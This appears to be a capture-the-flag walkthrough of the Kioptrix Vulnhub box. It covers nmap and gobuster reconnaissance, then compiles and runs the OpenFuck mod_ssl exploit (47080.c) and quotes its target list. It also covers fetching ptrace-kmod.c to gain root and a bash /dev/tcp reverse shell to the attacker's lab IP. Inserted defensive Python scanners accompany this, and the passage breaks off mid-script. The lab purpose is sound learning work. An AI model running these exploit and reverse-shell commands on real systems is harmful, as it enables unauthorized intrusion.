Vulnhub beginner box


# Preparation

Download, extract, set the VM to NAT mode, scan the internal network from Kali once, then boot the target and scan again to identify the target IP.

![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822222618.png)

Target IP: 192.168.49.129

-sn is a ping test only; it does not probe ports, so it is faster and a bit stealthier. -sP does both a ping test and a port probe, which is noisier; normally -sn is the better choice.

# Information gathering

## Ports

Full port scan:

```bash
nmap -p- 192.168.49.129
```

![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822223921.png)

Port 139 showed up here. I had not seen it before, but the blogger says it is a common port, so I looked it up.

Port 139 is typically used by the NetBIOS service on Windows systems. NetBIOS (Network Basic Input/Output System) is an early network communication protocol used on local networks for communication, file and printer sharing, and similar tasks. It provides a mechanism for discovering other computers on the LAN, sharing resources and communicating with them. Specifically, port 139 carries the NetBIOS session service. Over this port a computer can:

1. Share files and printers: port 139 lets a computer share folders and printers so that other computers can access those shared resources.
2. Communicate and pass messages: NetBIOS can also be used for communication and messaging between computers. It can broadcast messages on the LAN for discovery and communication.

What it does is similar to the `python -m http.server` from earlier in the day: transferring files, sending messages, and sharing resources over the network.

This step could be skipped, but scanning the ports first keeps things more organized.

### Information obtained so far

```bash
ip
192.168.49.129

open ports
22 ssh
80
111 rpcbind
139 file transfer / resource sharing
443
1024 kdm
```

Next, collect the full system and version information:

-sV version information
-A version plus operating-system detection

```bash
┌──(root㉿kali)-[~]
└─# nmap -sV -A 192.168.49.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 10:49 EDT
Nmap scan report for 192.168.49.129
Host is up (0.0022s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods: 
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1024/tcp   status
|_  100024  1           1024/udp   status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_http-title: 400 Bad Request
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2023-08-22T14:51:55+00:00; +1m52s from scanner time.
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 1m51s

TRACEROUTE
HOP RTT     ADDRESS
1   2.23 ms 192.168.49.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.26 seconds
```

One screenshot could not fit all of this, so I copied it here directly.

A quick analysis: it is a Red Hat system running the Apache service.
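Reading a long `nmap -sV -A` report by eye is error-prone, so here is a small triage script, added for this write-up (not code from the original post or from nmap), that parses the report text above and lists the legacy-protocol and weak-crypto findings a defender would fix first: SSHv1 still negotiated, an end-of-life Apache 1.3.x / OpenSSL 0.9.x build, the TRACE method left enabled, SSLv2 with export-grade ciphers, and a certificate that expired in 2010. `SAMPLE` is an excerpt of the report shown above, trimmed to the lines the parser looks at; the finding labels are my own naming.

```python
"""Triage an ``nmap -sV -A`` report for legacy-protocol and weak-crypto findings.

Added example for this write-up, not code from the original post or from nmap.
It reads the text nmap prints and flags the items a defender would fix first.
SAMPLE is an excerpt of the report above, trimmed to the lines the parser uses.
"""
import re
from datetime import datetime

SAMPLE = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
"""

# "22/tcp   open  ssh   OpenSSH 2.9p2 (protocol 1.99)" -> port, proto, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Version-string checks: Apache 1.3.x (end of life since 2010), OpenSSL 0.9.x,
# and "protocol 1.99", which means the SSH server still negotiates SSH1.
VERSION_CHECKS = [
    (re.compile(r"Apache(?:/| httpd )1\.3\."), "apache-1.3-eol"),
    (re.compile(r"OpenSSL/0\.9\."), "openssl-0.9-eol"),
    (re.compile(r"protocol 1\.99"), "ssh-protocol-1.99"),
]


def triage(report, now=None):
    """Return (port, finding) pairs in report order, without duplicates."""
    now = now or datetime.now()
    findings = []
    port = None

    def add(label):
        if port is not None and (port, label) not in findings:
            findings.append((port, label))

    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            version = m.group(4)
            for pattern, label in VERSION_CHECKS:
                if pattern.search(version):
                    add(label)
            continue
        if not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()  # drop the NSE script-output prefix
        if "Server supports SSHv1" in body:
            add("sshv1-enabled")
        elif body.startswith("Potentially risky methods:") and "TRACE" in body:
            add("http-trace-enabled")
        elif body == "SSLv2 supported":
            add("sslv2-enabled")
        elif body.startswith("SSL2_") and "EXPORT" in body:
            add("sslv2-export-cipher")
        elif body.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(body.split(":", 1)[1].strip())
            if expiry < now:
                add("certificate-expired")
    return findings


def triage_sample():
    """Run the triage against SAMPLE as of the scan date shown in the report."""
    return triage(SAMPLE, now=datetime(2023, 8, 22))


if __name__ == "__main__":
    for port, label in triage_sample():
        print(f"{port:>5}/tcp  {label}")
```

Run it on a saved `nmap -oN` file by passing the file contents to `triage()`; the certificate check takes the reference date as a parameter so results are reproducible when an old report is re-examined.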

# Apache route

## Entering the site

Looked around and found nothing useful; several paths could not be accessed, so scan the directories:

```bash
gobuster dir --url http://192.168.49.129 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
```

(Oddly, the system did not have gobuster installed, nor the SecLists wordlists, so both had to be downloaded first.)

```bash
apt install gobuster
git clone https://github.com/danielmiessler/SecLists.git
```

Tried them and found nothing: either insufficient permissions to get in, or a redirect to the Red Hat website.

The Apache version is 1.3.20.

This 1.3.20 is the servlet version number; it shows the version is very old, so we have a target: search for vulnerabilities in old Apache versions.

## Exploit and privilege escalation

mod_ssl is a module of the Apache HTTP server. searchsploit searches the Exploit Database; you can also search online at https://www.rapid7.com/db/, but searching inside Kali shows the path of the matching exploit, which is more convenient (/usr/share/exploitdb/exploits).
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823003027.png)

The newest entry found on the site is this one:

```bash
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)|unix/remote/47080.c
```

Copy it to the desktop for convenience:

```bash
┌──(root㉿kali)-[/usr/share/exploitdb/exploits]
└─# cp unix/remote/47080.c /root/Desktop
```

Opening the script, the comments say some dependencies must be installed, so create a virtual environment and install them:

```bash
python -m venv venv   # the Python on my Kali is Python 2
source venv/bin/activate
apt-get install libssl-dev
gcc -o 47080 47080.c -lcrypto
# gcc is the compiler; -o 47080 produces an executable named 47080; 47080.c is the file to compile;
# -lcrypto is the library to link, taken from the line after the dependency note
```

Compiler output (the blogger says this means it compiled successfully, though at first glance it looks like a failure):

```bash
┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# gcc -o 47080 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  534 |                 RC4(ssl->rc4_read_key, rec_len, buf, buf);
      |                 ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  583 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  584 |                 MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  585 |                 MD5_Update(&ctx, rec, rec_len);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  586 |                 MD5_Update(&ctx, &seq, 4);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  587 |                 MD5_Final(p, &ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  594 |                 RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
      |                 ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
   37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
      |                            ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  748 |         if (EVP_PKEY_get1_RSA(pkey) == NULL) {
      |         ^~
In file included from /usr/include/openssl/x509.h:29,
                 from /usr/include/openssl/ssl.h:31,
                 from 47080.c:21:
/usr/include/openssl/evp.h:1348:16: note: declared here
 1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:282:5: note: declared here
  282 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
      |     ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  754 |         encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
      |         ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1348:16: note: declared here
 1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
      |                ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  791 |                 MD5_Init(&ctx);
      |                 ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
   49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
      |                           ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  793 |                 MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  794 |                 MD5_Update(&ctx,&c,1);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  796 |                 MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  797 |                 MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
      |                 ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
   50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
      |                           ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  798 |                 MD5_Final(km,&ctx);
      |                 ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
   51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
      |                           ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  807 |         RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
  811 |         RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
      |         ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
   35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
      |                            ^~~~~~~~~~~
```

The binary has been built. Run it with ./47080 (typing 47080 on its own does not work):

```bash
┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# ./47080   

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./47080 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  

  Supported OffSet:
        0x00 - Caldera OpenLinux (apache-1.3.26)
        0x01 - Cobalt Sun 6.0 (apache-1.3.12)
        0x02 - Cobalt Sun 6.0 (apache-1.3.20)
        0x03 - Cobalt Sun x (apache-1.3.26)
        0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
        0x05 - Conectiva 4 (apache-1.3.6)
        0x06 - Conectiva 4.1 (apache-1.3.9)
        0x07 - Conectiva 6 (apache-1.3.14)
        0x08 - Conectiva 7 (apache-1.3.12)
        0x09 - Conectiva 7 (apache-1.3.19)
        0x0a - Conectiva 7/8 (apache-1.3.26)
        0x0b - Conectiva 8 (apache-1.3.22)
        0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
        0x0d - Debian GNU Linux (apache_1.3.19-1)
        0x0e - Debian GNU Linux (apache_1.3.22-2)
        0x0f - Debian GNU Linux (apache-1.3.22-2.1)
        0x10 - Debian GNU Linux (apache-1.3.22-5)
        0x11 - Debian GNU Linux (apache_1.3.23-1)
        0x12 - Debian GNU Linux (apache_1.3.24-2.1)
        0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
        0x14 - Debian GNU Linux (apache_1.3.24-3)
        0x15 - Debian GNU Linux (apache-1.3.26-1)
        0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
        0x17 - Debian GNU Linux (apache-1.3.27)
        0x18 - FreeBSD (apache-1.3.9)
        0x19 - FreeBSD (apache-1.3.11)
        0x1a - FreeBSD (apache-1.3.12.1.40)
        0x1b - FreeBSD (apache-1.3.12.1.40)
        0x1c - FreeBSD (apache-1.3.12.1.40)
        0x1d - FreeBSD (apache-1.3.12.1.40_1)
        0x1e - FreeBSD (apache-1.3.12)
        0x1f - FreeBSD (apache-1.3.14)
        0x20 - FreeBSD (apache-1.3.14)
        0x21 - FreeBSD (apache-1.3.14)
        0x22 - FreeBSD (apache-1.3.14)
        0x23 - FreeBSD (apache-1.3.14)
        0x24 - FreeBSD (apache-1.3.17_1)
        0x25 - FreeBSD (apache-1.3.19)
        0x26 - FreeBSD (apache-1.3.19_1)
        0x27 - FreeBSD (apache-1.3.20)
        0x28 - FreeBSD (apache-1.3.20)
        0x29 - FreeBSD (apache-1.3.20+2.8.4)
        0x2a - FreeBSD (apache-1.3.20_1)
        0x2b - FreeBSD (apache-1.3.22)
        0x2c - FreeBSD (apache-1.3.22_7)
        0x2d - FreeBSD (apache_fp-1.3.23)
        0x2e - FreeBSD (apache-1.3.24_7)
        0x2f - FreeBSD (apache-1.3.24+2.8.8)
        0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
        0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
        0x32 - FreeBSD (apache-1.3.27)
        0x33 - Gentoo Linux (apache-1.3.24-r2)
        0x34 - Linux Generic (apache-1.3.14)
        0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
        0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
        0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
        0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
        0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
        0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
        0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
        0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
        0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
        0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
        0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
        0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
        0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
        0x42 - Mandrake Linux 8.2 (apache-1.3.24)
        0x43 - Mandrake Linux 9 (apache-1.3.26)
        0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
        0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
        0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
        0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
        0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
        0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
        0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
        0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
        0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
        0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
        0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
        0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
        0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
        0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
        0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
        0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
        0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
        0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
        0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
        0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
        0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
        0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
        0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
        0x5b - Redhat Linux 7.x (apache-1.3.22)
        0x5c - RedHat Linux 7.x (apache-1.3.26-1)
        0x5d - RedHat Linux 7.x (apache-1.3.27)
        0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
        0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
        0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
        0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
        0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
        0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
        0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
        0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
        0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
        0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
        0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
        0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
        0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
        0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
        0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
        0x6d - RedHat Linux 7.2 (apache-1.3.24)
        0x6e - RedHat Linux 7.2 (apache-1.3.26)
        0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
        0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
        0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
        0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
        0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
        0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
        0x75 - RedHat Linux 7.3 (apache-1.3.27)
        0x76 - RedHat Linux 8.0 (apache-1.3.27)
        0x77 - RedHat Linux 8.0-second (apache-1.3.27)
        0x78 - RedHat Linux 8.0 (apache-2.0.40)
        0x79 - Slackware Linux 4.0 (apache-1.3.6)
        0x7a - Slackware Linux 7.0 (apache-1.3.9)
        0x7b - Slackware Linux 7.0 (apache-1.3.26)
        0x7c - Slackware 7.0  (apache-1.3.26)2
        0x7d - Slackware Linux 7.1 (apache-1.3.12)
        0x7e - Slackware Linux 8.0 (apache-1.3.20)
        0x7f - Slackware Linux 8.1 (apache-1.3.24)
        0x80 - Slackware Linux 8.1 (apache-1.3.26)
        0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
        0x82 - Slackware Linux (apache-1.3.27)
        0x83 - SuSE Linux 7.0 (apache-1.3.12)
        0x84 - SuSE Linux 7.1 (apache-1.3.17)
        0x85 - SuSE Linux 7.2 (apache-1.3.19)
        0x86 - SuSE Linux 7.3 (apache-1.3.20)
        0x87 - SuSE Linux 8.0 (apache-1.3.23)
        0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
        0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
        0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)

Fuck to all guys who like use lamah ddos. Read SRC to have no surprise
```

The usage instructions are given here.

![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823114242.png)

First find the matching version entries; 0x6a and 0x6b are usable:

```bash
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
```

So the invocation is:

```bash
./47080 0x6a 192.168.49.129 -c 40
```

0x6a fails; 0x6b succeeds, but the shell runs as apache rather than root, so privilege escalation is still needed.

Not root here, and the message indicates a missing file:

```bash
Unable to establish SSL connection.

Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
```

ptrace-kmod.c is the script the exploit needs but cannot find.

So the corresponding file has to be downloaded. First pull 47080.c back to the local machine to inspect it (the Python HTTP file transfer on port 8000 from yesterday comes in handy).

Ctrl+F to search.

Kali can download it, but the target cannot, so transfer it over:

```bash
wget 192.168.49.130:8000/ptrace-kmod.c
```

It downloaded successfully, and root is obtained. The earlier cause: the C exploit automatically downloads the corresponding library (probably, or some other dependency) and compiles it, but the target has no network connectivity and cannot fetch that file; so we download it ourselves and transfer it over, and then it works.

passwd to change the password, and we can log in. This feels like it is already finished, but to follow the tutorial and learn the approach, the next step is a reverse shell.

## Reverse shell

```bash
# kali
nc -lvvp 1234
# netcat: -l listen; -vv verbose (-v also works); -p 1234 the port opened on kali
# target; 130 here is kali's IP
bash -i >&  /dev/tcp/192.168.49.130/1234 0>&1
# bash -i is an interactive bash
# >& /dev/tcp/192.168.49.130/1234: the > sends the interactive bash stream to the file that follows;
#   & is something like a symbol that designates a file? /dev/tcp/ip/port is a fixed pattern meaning connect over TCP
# 0>&1: 0 is standard input (what is typed on the keyboard), sent to 1; 1 is standard output, i.e. what appears on screen
```

Connection successful.
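The comments above trace the redirections by hand; a precise reading is that `>& path` sends both standard output (1) and standard error (2) to `path`, and `0>&1` then makes standard input a copy of descriptor 1, so all three descriptors end up on the socket. The detection script below, added for this write-up and not part of the original post, applies exactly that reasoning from the defender's side: it replays a command line's redirections to find where descriptors 0, 1 and 2 end up, and raises a high-severity finding when a shell has its input and output on the same `/dev/tcp` or `/dev/udp` path, while a one-off outbound `/dev/tcp` read (a common connectivity check) is reported at medium severity. The `LOG` lines are constructed in an auditd-like style; their field layout, and the severity labels, are assumptions of this example.

```python
"""Spot bash ``/dev/tcp`` reverse-shell command lines in process logs.

Added example for this write-up, not code from the original post. It replays
the redirections on a command line to see which file descriptors end up on a
network path, and alerts when a shell has both input and output on the same
socket. LOG is constructed in an auditd-like style; the field layout is assumed.
"""
import re

LOG = [
    'type=EXECVE pid=1311 user=apache cmd="bash -i >& /dev/tcp/192.168.49.130/1234 0>&1"',
    'type=EXECVE pid=1312 user=root cmd="wget 192.168.49.130:8000/ptrace-kmod.c"',
    'type=EXECVE pid=1313 user=root cmd="bash -c \': </dev/tcp/127.0.0.1/8000\'"',
    'type=EXECVE pid=1314 user=root cmd="grep -r error /var/log 2>/dev/null"',
]

LOG_RE = re.compile(r'pid=(\d+) user=(\S+) cmd="(.*)"$')
# One redirection token: optional fd number, operator, optional '&', optional target
REDIR_RE = re.compile(r"^(\d*)(>>|>|<)(&?)(.*)$")
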